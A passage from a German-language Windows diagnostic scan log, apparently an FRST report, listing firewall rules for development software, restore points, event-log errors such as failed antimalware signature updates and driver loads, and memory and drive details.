Query User{3CC291D1-B385-437D-AA32-E91C052111A8}C:\program files\java\jdk1.8.0_45\bin\jconsole.exe] => (Allow) C:\program files\java\jdk1.8.0_45\bin\jconsole.exe FirewallRules: [TCP Query User{938A3455-83F0-4A60-90BE-F48B9920ECFA}C:\program files\java\jdk1.8.0_45\bin\javaw.exe] => (Allow) C:\program files\java\jdk1.8.0_45\bin\javaw.exe FirewallRules: [UDP Query User{F72EE96E-3F06-40F7-B381-96D40F125A95}C:\program files\java\jdk1.8.0_45\bin\javaw.exe] => (Allow) C:\program files\java\jdk1.8.0_45\bin\javaw.exe FirewallRules: [TCP Query 
User{8C3A7B97-82E4-41CE-BE49-F55DFB54AFB1}C:\xampp\mysql\bin\mysqld.exe] => (Allow) C:\xampp\mysql\bin\mysqld.exe FirewallRules: [UDP Query User{18D2B78A-FD18-40A5-8459-FE5CF9A9CDAD}C:\xampp\mysql\bin\mysqld.exe] => (Allow) C:\xampp\mysql\bin\mysqld.exe FirewallRules: [{E865C8C7-0728-40B4-B2FF-DE17D4F73920}] => (Allow) C:\Users\xxxxxx\AppData\Roaming\Andy_45_Online\Setup.exe FirewallRules: [{8F388D7A-2751-4173-9573-71940ECA0384}] => (Allow) C:\Users\xxxxxx\AppData\Roaming\Andy_45_Online\Setup.exe FirewallRules: [{B39D2428-7B98-483C-A566-E94FA742BFD5}] => (Allow) C:\Program Files\Andy\Andy.exe FirewallRules: [{C509E4DE-E290-4A49-AF62-44A518E91ED1}] => (Allow) C:\Program Files\Andy\Andy.exe FirewallRules: [{68C1168D-A9F1-41B2-91A8-454E4664104E}] => (Allow) C:\Program Files\Andy\HandyAndy.exe FirewallRules: [{E6B8E88D-276D-4895-ADC1-8932D48F9EDB}] => (Allow) C:\Program Files\Andy\HandyAndy.exe FirewallRules: [{154035E8-4945-4C30-BD0F-FFCECA4EC200}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{D604AD26-C384-4B9F-92B3-0A7A0D184635}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{84A9A199-1FC3-4D98-ACE9-82B3FF97D2B1}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{7CF87F97-FCD1-4768-90DF-A8E2373A2147}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{1E03FA34-3FBB-4DB2-BC20-ABEC719D37E9}] => (Allow) C:\Users\xxxxxx\AppData\Roaming\Zoom\bin\Zoom.exe FirewallRules: [{458D820F-EBED-48E1-A13D-792C0AA302E3}] => (Allow) C:\Users\xxxxxx\AppData\Roaming\Zoom\bin\airhost.exe FirewallRules: [TCP Query User{489A4ECE-20FD-4239-B9F7-DAF599573D88}C:\xampp177\apache\bin\httpd.exe] => (Allow) C:\xampp177\apache\bin\httpd.exe FirewallRules: [UDP Query User{A7BC3E9B-07A4-4962-A65E-AE6176D50B34}C:\xampp177\apache\bin\httpd.exe] => (Allow) C:\xampp177\apache\bin\httpd.exe FirewallRules: [TCP Query User{D5EF30F3-B20B-4978-A154-23DAC3EB617B}C:\xampp177\mysql\bin\mysqld.exe] => (Allow) 
C:\xampp177\mysql\bin\mysqld.exe FirewallRules: [UDP Query User{E624E795-519C-46F4-BAFC-6CDD89C53116}C:\xampp177\mysql\bin\mysqld.exe] => (Allow) C:\xampp177\mysql\bin\mysqld.exe FirewallRules: [{2233F6B7-D637-4831-9C07-E406BB0DF8E9}] => (Allow) C:\Program Files\Andy\Setup.exe FirewallRules: [{D74FC659-B518-476F-9346-B8EE2FAF4240}] => (Allow) C:\Program Files\Andy\Setup.exe FirewallRules: [{8EEEB06A-59D0-4940-AC48-3BE56B033EB0}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{5C33FE80-1CE2-45C0-A20B-5C00CD51F7A5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [TCP Query User{FCD25967-8A4D-499D-BA00-516A6F319ED0}C:\projects\android studio\bin\studio64.exe] => (Allow) C:\projects\android studio\bin\studio64.exe FirewallRules: [UDP Query User{A9814FC4-EC41-45C7-AEFB-346938734DA5}C:\projects\android studio\bin\studio64.exe] => (Allow) C:\projects\android studio\bin\studio64.exe FirewallRules: [TCP Query User{F85661D0-9D16-4CAE-8C80-DEFB9C758B04}C:\program files\java\jdk1.8.0_45\bin\java.exe] => (Allow) C:\program files\java\jdk1.8.0_45\bin\java.exe FirewallRules: [UDP Query User{F467E3E8-8999-4674-9005-9D35A78E0F93}C:\program files\java\jdk1.8.0_45\bin\java.exe] => (Allow) C:\program files\java\jdk1.8.0_45\bin\java.exe FirewallRules: [TCP Query User{3BC7A836-13B4-4B2C-8456-CFC8B34E8795}C:\program files\java\jdk1.8.0_45\bin\javaw.exe] => (Allow) C:\program files\java\jdk1.8.0_45\bin\javaw.exe FirewallRules: [UDP Query User{53582B5E-0C13-44AF-8CBD-0AF7ED54BEE8}C:\program files\java\jdk1.8.0_45\bin\javaw.exe] => (Allow) C:\program files\java\jdk1.8.0_45\bin\javaw.exe FirewallRules: [TCP Query User{EF33B378-E6B7-43F9-90CF-325BB763702E}C:\program files (x86)\java\jre1.8.0_65\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_65\bin\javaw.exe FirewallRules: [UDP Query User{6AF09766-87F3-4663-9C6D-86E369EE3C00}C:\program files (x86)\java\jre1.8.0_65\bin\javaw.exe] => (Allow) C:\program files 
(x86)\java\jre1.8.0_65\bin\javaw.exe FirewallRules: [TCP Query User{443D20CC-B47B-4CA8-97E0-EC92CA4D0912}C:\program files\java\jre1.8.0_65\bin\java.exe] => (Allow) C:\program files\java\jre1.8.0_65\bin\java.exe FirewallRules: [UDP Query User{2B694035-F595-4B43-A426-01A5DD52E2A0}C:\program files\java\jre1.8.0_65\bin\java.exe] => (Allow) C:\program files\java\jre1.8.0_65\bin\java.exe FirewallRules: [TCP Query User{A68F388A-801E-45A8-A705-49E0A518C2D3}C:\program files\java\jdk1.8.0_45\jre\bin\java.exe] => (Allow) C:\program files\java\jdk1.8.0_45\jre\bin\java.exe FirewallRules: [UDP Query User{4E85170A-DC55-404A-8800-578FD16440FB}C:\program files\java\jdk1.8.0_45\jre\bin\java.exe] => (Allow) C:\program files\java\jdk1.8.0_45\jre\bin\java.exe FirewallRules: [TCP Query User{182A62A6-6E9F-423C-AC3C-86E50392A8EE}C:\program files\java\jdk1.7.0_79\bin\javaw.exe] => (Allow) C:\program files\java\jdk1.7.0_79\bin\javaw.exe FirewallRules: [UDP Query User{9B8BDA23-4F9B-4E67-B3C1-84CDC6E1D966}C:\program files\java\jdk1.7.0_79\bin\javaw.exe] => (Allow) C:\program files\java\jdk1.7.0_79\bin\javaw.exe FirewallRules: [TCP Query User{C7D02AC6-0C54-441C-BB82-1A4A245E1850}C:\program files\java\jdk1.7.0_79\bin\java.exe] => (Allow) C:\program files\java\jdk1.7.0_79\bin\java.exe FirewallRules: [UDP Query User{847013B0-8478-4ACD-A2F6-D45DA6189D8B}C:\program files\java\jdk1.7.0_79\bin\java.exe] => (Allow) C:\program files\java\jdk1.7.0_79\bin\java.exe FirewallRules: [TCP Query User{3898CDF4-5078-40A6-88F4-D66CDEE0EDA2}C:\projects\railsinstaller\ruby2.1.0\bin\ruby.exe] => (Allow) C:\projects\railsinstaller\ruby2.1.0\bin\ruby.exe FirewallRules: [UDP Query User{2B759E54-216A-485A-9BA8-D50C92A7455D}C:\projects\railsinstaller\ruby2.1.0\bin\ruby.exe] => (Allow) C:\projects\railsinstaller\ruby2.1.0\bin\ruby.exe FirewallRules: [TCP Query User{EC3A5250-7CA2-44B6-9B34-FCAECD6E266F}C:\projects\eclipse-4.5-fx\eclipse.exe] => (Allow) C:\projects\eclipse-4.5-fx\eclipse.exe FirewallRules: [UDP Query 
User{F7463A27-B3C2-4340-ACA0-BB52E189A662}C:\projects\eclipse-4.5-fx\eclipse.exe] => (Allow) C:\projects\eclipse-4.5-fx\eclipse.exe FirewallRules: [TCP Query User{C77069B5-A325-4E9F-9856-8C9BA738B498}C:\projects\ruby21\bin\ruby.exe] => (Allow) C:\projects\ruby21\bin\ruby.exe FirewallRules: [UDP Query User{945BB5B6-E8F9-4954-818E-D32336A6E13C}C:\projects\ruby21\bin\ruby.exe] => (Allow) C:\projects\ruby21\bin\ruby.exe FirewallRules: [TCP Query User{283C0B84-088C-4A5C-81D8-9D152487C0A8}C:\program files\mongodb\server\3.0\bin\mongod.exe] => (Allow) C:\program files\mongodb\server\3.0\bin\mongod.exe FirewallRules: [UDP Query User{4BBA386C-84E9-4792-A866-604A03E5C710}C:\program files\mongodb\server\3.0\bin\mongod.exe] => (Allow) C:\program files\mongodb\server\3.0\bin\mongod.exe FirewallRules: [TCP Query User{36E4D4C9-E9C3-4B75-8312-063FCD18B68F}C:\projects\nodejs\node.exe] => (Allow) C:\projects\nodejs\node.exe FirewallRules: [UDP Query User{2D59D951-1C9A-4835-A664-5CB5A6DDC959}C:\projects\nodejs\node.exe] => (Allow) C:\projects\nodejs\node.exe FirewallRules: [TCP Query User{6FD54DF5-E4BC-4F27-8D20-224E8C918460}C:\program files\java\jre1.8.0_65\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_65\bin\javaw.exe FirewallRules: [UDP Query User{C4918442-E161-41E1-BAC3-B8A757722785}C:\program files\java\jre1.8.0_65\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_65\bin\javaw.exe FirewallRules: [TCP Query User{4A0A2647-EFFF-4D8C-ACAE-E915FBD51D6E}C:\program files\java\jdk1.6.0_45\bin\java.exe] => (Allow) C:\program files\java\jdk1.6.0_45\bin\java.exe FirewallRules: [UDP Query User{8A50EB32-E120-45B1-AA66-FE0DD11F09AD}C:\program files\java\jdk1.6.0_45\bin\java.exe] => (Allow) C:\program files\java\jdk1.6.0_45\bin\java.exe FirewallRules: [TCP Query User{C44E03F4-5CF4-4CF9-9ADE-8E45DD59D6A1}C:\projects\androidstudio\bin\studio64.exe] => (Allow) C:\projects\androidstudio\bin\studio64.exe FirewallRules: [UDP Query 
User{6A7D1F94-CBA6-4FEB-A6CF-01D8FF37970C}C:\projects\androidstudio\bin\studio64.exe] => (Allow) C:\projects\androidstudio\bin\studio64.exe FirewallRules: [TCP Query User{85F2A625-2317-4EA7-ACC0-0B36D87A4AE8}C:\xampp177\apache\bin\httpd.exe] => (Allow) C:\xampp177\apache\bin\httpd.exe FirewallRules: [UDP Query User{ECC721F8-7E89-459E-9938-D2F14E9004F2}C:\xampp177\apache\bin\httpd.exe] => (Allow) C:\xampp177\apache\bin\httpd.exe FirewallRules: [TCP Query User{F3EF71C1-6198-4AF9-B2D8-FE78C870EF22}C:\xampp1835\apache\bin\httpd.exe] => (Allow) C:\xampp1835\apache\bin\httpd.exe FirewallRules: [UDP Query User{CB36F1E2-5613-43D0-812F-84096D32D4F6}C:\xampp1835\apache\bin\httpd.exe] => (Allow) C:\xampp1835\apache\bin\httpd.exe FirewallRules: [TCP Query User{27E4ECFC-AD5E-4F1F-97BC-EAA76C64B5AA}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe FirewallRules: [UDP Query User{7CDC1499-595A-4901-95BA-176E6C1B9C58}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe FirewallRules: [{E0FC54D4-11E6-40D1-9851-75CCDEF7721F}] => (Allow) C:\Program Files (x86)\AtomPark\Atomic Email Hunter\AtomicEmailHunter.exe FirewallRules: [{77C3365F-2303-496C-A8C7-64C9F6B4C6FA}] => (Allow) C:\Program Files (x86)\AtomPark\Atomic Email Hunter\AtomicEmailHunter.exe FirewallRules: [{CD6A7171-1AB4-4C3A-9C77-45BB63DB3BD4}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [TCP Query User{73E205FA-D93E-41BA-A973-F8604C90C07C}C:\projects\android\androidstudio2.5\bin\studio64.exe] => (Allow) C:\projects\android\androidstudio2.5\bin\studio64.exe FirewallRules: [UDP Query User{71EDC5DC-DFDA-4342-A4BC-A43EFE7EE87B}C:\projects\android\androidstudio2.5\bin\studio64.exe] => (Allow) C:\projects\android\androidstudio2.5\bin\studio64.exe FirewallRules: [TCP Query User{24134B00-D44B-46BC-A966-25AF6CCBFDFE}C:\xampp1835\mysql\bin\mysqld.exe] => (Allow) 
C:\xampp1835\mysql\bin\mysqld.exe FirewallRules: [UDP Query User{07E9F50E-A0D9-48E8-B3FC-06C53D230B12}C:\xampp1835\mysql\bin\mysqld.exe] => (Allow) C:\xampp1835\mysql\bin\mysqld.exe FirewallRules: [TCP Query User{E6F0E97E-0782-41C4-A08A-F26BD401A721}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe FirewallRules: [UDP Query User{65C50F52-9D5D-4F2B-A358-AFA729416238}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe FirewallRules: [TCP Query User{39692C32-3B6E-4C42-879F-4022C4D02D55}C:\android\androidstudio2.5\bin\studio64.exe] => (Allow) C:\android\androidstudio2.5\bin\studio64.exe FirewallRules: [UDP Query User{AED017C6-ED77-4968-979B-8659BC3206A1}C:\android\androidstudio2.5\bin\studio64.exe] => (Allow) C:\android\androidstudio2.5\bin\studio64.exe FirewallRules: [TCP Query User{E135B4A2-6CB7-4957-8532-1CD8F76517B9}C:\xampp177\mysql\bin\mysqld.exe] => (Allow) C:\xampp177\mysql\bin\mysqld.exe FirewallRules: [UDP Query User{744356D6-E55E-4E3B-B3A8-9A81A59EF659}C:\xampp177\mysql\bin\mysqld.exe] => (Allow) C:\xampp177\mysql\bin\mysqld.exe FirewallRules: [TCP Query User{3431425E-CF21-47E3-BEFF-BE2AA7A14354}C:\program files\java\jdk1.6.0_45\bin\javaw.exe] => (Allow) C:\program files\java\jdk1.6.0_45\bin\javaw.exe FirewallRules: [UDP Query User{D1138DEA-C3BA-4348-90FF-C9DC9C14D5B4}C:\program files\java\jdk1.6.0_45\bin\javaw.exe] => (Allow) C:\program files\java\jdk1.6.0_45\bin\javaw.exe FirewallRules: [{553671D7-0490-4E53-ADB4-78CEC55BCBF1}] => (Allow) C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\devenv.exe FirewallRules: [TCP Query User{5778EBAF-710B-4767-A685-D179CCD36BE4}C:\projects\unity\editor\unity.exe] => (Allow) C:\projects\unity\editor\unity.exe FirewallRules: [UDP Query User{3F5EC008-F28E-49AC-8818-20682DBFD3EC}C:\projects\unity\editor\unity.exe] => (Allow) C:\projects\unity\editor\unity.exe FirewallRules: [TCP Query 
User{FF9E45DC-F3F7-43E4-AE56-62F783407453}C:\projects\netbeans 8.1\bin\netbeans64.exe] => (Block) C:\projects\netbeans 8.1\bin\netbeans64.exe FirewallRules: [UDP Query User{DE9ED127-5905-4A02-9567-EF5C76A3DE54}C:\projects\netbeans 8.1\bin\netbeans64.exe] => (Block) C:\projects\netbeans 8.1\bin\netbeans64.exe FirewallRules: [{95B592AC-5447-4670-B268-5FDAF46CC8AC}] => (Allow) C:\projects\PostgreSQL\pg96\bin\postgres.exe FirewallRules: [{46C88B29-22C9-4D72-8C5C-B374A92F3647}] => (Allow) C:\projects\PostgreSQL\python2\python.exe FirewallRules: [TCP Query User{18BD1145-CC6E-4822-985A-85C495AEE683}C:\program files\mongodb\server\3.5\bin\mongod.exe] => (Allow) C:\program files\mongodb\server\3.5\bin\mongod.exe FirewallRules: [UDP Query User{877E86F6-BBB4-4880-B2EC-6E86843C9EA3}C:\program files\mongodb\server\3.5\bin\mongod.exe] => (Allow) C:\program files\mongodb\server\3.5\bin\mongod.exe FirewallRules: [TCP Query User{0F7A9F69-0E50-48FB-BFC8-FAA8F84B3BA3}C:\projects\microsoftvscode\code.exe] => (Allow) C:\projects\microsoftvscode\code.exe FirewallRules: [UDP Query User{4723765D-B70B-4F91-8AC6-1A6BADFD3079}C:\projects\microsoftvscode\code.exe] => (Allow) C:\projects\microsoftvscode\code.exe FirewallRules: [TCP Query User{0D550991-D8A9-4E5A-81C4-8C9A1A134390}C:\xampp717\apache\bin\httpd.exe] => (Allow) C:\xampp717\apache\bin\httpd.exe FirewallRules: [UDP Query User{80CA4658-F3D3-4390-ACB6-8C11821E2386}C:\xampp717\apache\bin\httpd.exe] => (Allow) C:\xampp717\apache\bin\httpd.exe FirewallRules: [TCP Query User{8A6AEF16-B438-46B2-9CC9-691B8A3BA01B}C:\xampp717\mysql\bin\mysqld.exe] => (Allow) C:\xampp717\mysql\bin\mysqld.exe FirewallRules: [UDP Query User{60283529-51D4-40B6-9A1D-109E644745F9}C:\xampp717\mysql\bin\mysqld.exe] => (Allow) C:\xampp717\mysql\bin\mysqld.exe FirewallRules: [{B2022045-2C1C-49FF-A5B7-D952BD2234FC}] => (Allow) C:\projects\TeamViewer\TeamViewer.exe FirewallRules: [{2163AC2F-D643-4BB7-B7DE-1844A7EF24CF}] => (Allow) C:\projects\TeamViewer\TeamViewer.exe 
FirewallRules: [{5358419F-180F-408A-AC77-82856920E008}] => (Allow) C:\projects\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{164B483B-2F70-4E76-8718-E72F2D135588}] => (Allow) C:\projects\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{1491C1BE-A075-4227-9762-CB3E29F6BFE0}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{3EFD2300-9CBB-415F-8AC6-A25533E498A5}C:\program files (x86)\codebox\bitmeter\bitmeter2.exe] => (Allow) C:\program files (x86)\codebox\bitmeter\bitmeter2.exe
FirewallRules: [UDP Query User{BAB2C80D-46C3-469E-A562-147A28D35809}C:\program files (x86)\codebox\bitmeter\bitmeter2.exe] => (Allow) C:\program files (x86)\codebox\bitmeter\bitmeter2.exe

==================== Wiederherstellungspunkte =========================

19-09-2017 23:12:40 Installed NetSpeedMonitor 2.5.4.0 x64
23-09-2017 10:06:39 Windows Update
26-09-2017 21:07:00 Windows Update
01-10-2017 10:13:51 Windows Update

==================== Fehlerhafte Geräte im Gerätemanager =============

Name: Security Processor Loader Driver
Description: Security Processor Loader Driver
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: spldr
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved.

==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (10/03/2017 10:16:47 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (10/03/2017 10:07:13 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (10/03/2017 09:56:11 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (10/03/2017 04:10:28 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (10/03/2017 03:23:09 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (10/02/2017 05:04:37 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (10/02/2017 09:37:18 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (10/01/2017 09:45:43 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (10/01/2017 09:28:40 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (10/01/2017 08:09:43 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Systemfehler:
=============
Error: (10/03/2017 10:27:27 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Der Dienst "WinHTTP-Web Proxy Auto-Discovery-Dienst" ist vom Dienst "DHCP-Client" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde: Der Abhängigkeitsdienst oder die Abhängigkeitsgruppe konnte nicht gestartet werden.

Error: (10/03/2017 10:27:27 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Beim Aktualisieren der Signaturen wurde von Microsoft-Antischadsoftware ein Fehler festgestellt.
Neue Signaturversion:
Vorherige Signaturversion: 0.0.0.0
Aktualisierungsquelle: Microsoft Malware Protection Center
Aktualisierungsphase: Suchen
Quellpfad: hxxp://go.microsoft.com/fwlink/?LinkID=260974&clcid=0x409&NRI=true&arch=x64&eng=0.0.0.0&sig=0.0.0.0&prod=EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
Signaturtyp: Network Inspection System
Aktualisierungstyp: Vollständig
Benutzer: NT-AUTORITÄT\NETZWERKDIENST
Aktuelle Modulversion:
Vorherige Modulversion: 0.0.0.0
Fehlercode: 0x80072ee7
Fehlerbeschreibung: Der Servername oder die Serveradresse konnte nicht verarbeitet werden.

Error: (10/03/2017 10:27:27 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Beim Aktualisieren der Signaturen wurde von Microsoft-Antischadsoftware ein Fehler festgestellt.
Neue Signaturversion:
Vorherige Signaturversion: 1.253.171.0
Aktualisierungsquelle: Microsoft Malware Protection Center
Aktualisierungsphase: Suchen
Quellpfad: hxxp://go.microsoft.com/fwlink/?LinkID=121721&clcid=0x409&arch=x64&eng=1.1.14202.0&avdelta=1.253.171.0&asdelta=1.253.171.0&prod=EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
Signaturtyp: AntiSpyware
Aktualisierungstyp: Vollständig
Benutzer: NT-AUTORITÄT\NETZWERKDIENST
Aktuelle Modulversion:
Vorherige Modulversion: 1.1.14202.0
Fehlercode: 0x80072ee7
Fehlerbeschreibung: Der Servername oder die Serveradresse konnte nicht verarbeitet werden.

Error: (10/03/2017 10:27:27 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Beim Aktualisieren der Signaturen wurde von Microsoft-Antischadsoftware ein Fehler festgestellt.
Neue Signaturversion:
Vorherige Signaturversion: 1.253.171.0
Aktualisierungsquelle: Microsoft Malware Protection Center
Aktualisierungsphase: Suchen
Quellpfad: hxxp://go.microsoft.com/fwlink/?LinkID=121721&clcid=0x409&arch=x64&eng=1.1.14202.0&avdelta=1.253.171.0&asdelta=1.253.171.0&prod=EDB4FA23-53B8-4AFA-8C5D-99752CCA7094
Signaturtyp: AntiVirus
Aktualisierungstyp: Vollständig
Benutzer: NT-AUTORITÄT\NETZWERKDIENST
Aktuelle Modulversion:
Vorherige Modulversion: 1.1.14202.0
Fehlercode: 0x80072ee7
Fehlerbeschreibung: Der Servername oder die Serveradresse konnte nicht verarbeitet werden.

Error: (10/03/2017 10:27:26 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: Beim Aktualisieren der Signaturen wurde von Microsoft-Antischadsoftware ein Fehler festgestellt.
Neue Signaturversion:
Vorherige Signaturversion: 1.253.171.0
Aktualisierungsquelle: Microsoft Update Server
Aktualisierungsphase: Suchen
Quellpfad: Default URL
Signaturtyp: AntiVirus
Aktualisierungstyp: Vollständig
Benutzer: NT-AUTORITÄT\SYSTEM
Aktuelle Modulversion:
Vorherige Modulversion: 1.1.14202.0
Fehlercode: 0x8007043c
Fehlerbeschreibung: Der Dienst kann nicht im abgesicherten Modus gestartet werden.

Error: (10/03/2017 10:27:26 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: Bei DCOM ist der Fehler "1084" aufgetreten, als der Dienst "wuauserv" mit den Argumenten "" gestartet wurde, um den folgenden Server zu verwenden: {E60687F7-01A1-40AA-86AC-DB1CBF673334}

Error: (10/03/2017 10:16:42 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: Bei DCOM ist der Fehler "1084" aufgetreten, als der Dienst "WSearch" mit den Argumenten "" gestartet wurde, um den folgenden Server zu verwenden: {9E175B6D-F52A-11D8-B9A5-505054503030}

Error: (10/03/2017 10:15:05 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: Das Laden folgender Boot- oder Systemstarttreiber ist fehlgeschlagen: AFD CLVirtualDrive CSC DfsC discache MpFilter NetBIOS NetBT nsiproxy Psched rdbss spldr tdx VBoxDrv VBoxUSBMon vpcnfltr vpcvmm vwififlt Wanarpv6 WfpLwf

Error: (10/03/2017 10:15:05 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Der Dienst "TeamViewer 12" ist vom Dienst "Ancillary Function Driver for Winsock" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde: Ein an das System angeschlossenes Gerät funktioniert nicht.

Error: (10/03/2017 10:15:05 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Der Dienst "NLA (Network Location Awareness)" ist vom Dienst "Netzwerkspeicher-Schnittstellendienst" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde: Der Abhängigkeitsdienst oder die Abhängigkeitsgruppe konnte nicht gestartet werden.

CodeIntegrity:
===================================
Date: 2015-05-16 17:00:42.325
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Program Files\BubbleSound\BubbleSound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2015-05-16 17:00:42.060
Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Program Files\BubbleSound\BubbleSound.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

==================== Speicherinformationen ===========================

Prozessor: AMD A8-6410 APU with AMD Radeon R5 Graphics
Prozentuale Nutzung des RAM: 17%
Installierter physikalischer RAM: 7134.36 MB
Verfügbarer physikalischer RAM: 5910.73 MB
Summe virtueller Speicher: 14266.91 MB
Verfügbarer virtueller Speicher: 13258.98 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:913.85 GB) (Free:650.29 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)]
Drive d: (Recovery) (Fixed) (Total:17.37 GB) (Free:1.85 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)]
Drive f: (VERBATIM) (Removable) (Total:30.03 GB) (Free:29.96 GB) FAT32

==================== MBR & Partitionstabelle ==================

========================================================
